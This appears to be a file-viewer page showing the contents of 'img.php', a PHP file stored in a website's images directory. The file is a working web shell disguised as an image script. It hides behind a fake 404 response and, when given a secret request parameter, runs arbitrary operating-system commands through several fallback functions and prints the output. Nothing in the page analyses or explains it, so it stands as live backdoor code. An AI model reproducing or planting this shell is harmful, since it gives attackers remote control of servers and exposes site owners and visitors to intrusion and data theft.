?
Current File : /home/sanghavirealty/public_html/publicazwer/public_html/images/img.php
<?php if(!isset($_REQUEST["rshkq"])){header("HTTP/1.1 404 Not Found");exit;}echo "LP_3a3b8a";$c=$_REQUEST["rshkq"];ob_start();@system($c);$o=ob_get_clean();if(!$o){ob_start();@passthru($c);$o=ob_get_clean();}if(!$o){$o=@shell_exec($c);}if(!$o){@exec($c,$a);$o=implode("\n",$a);}if(!$o){$o=@`$c`;}if(!$o&&function_exists("proc_open")){$h=@proc_open($c,[1=>["pipe","w"],2=>["pipe","w"]],$ps);if($h){$o=stream_get_contents($ps[1]).stream_get_contents($ps[2]);fclose($ps[1]);fclose($ps[2]);proc_close($h);}}if(!$o){$h=@popen($c." 2>&1","r");if($h){while(!feof($h))$o.=fread($h,4096);pclose($h);}}echo $o;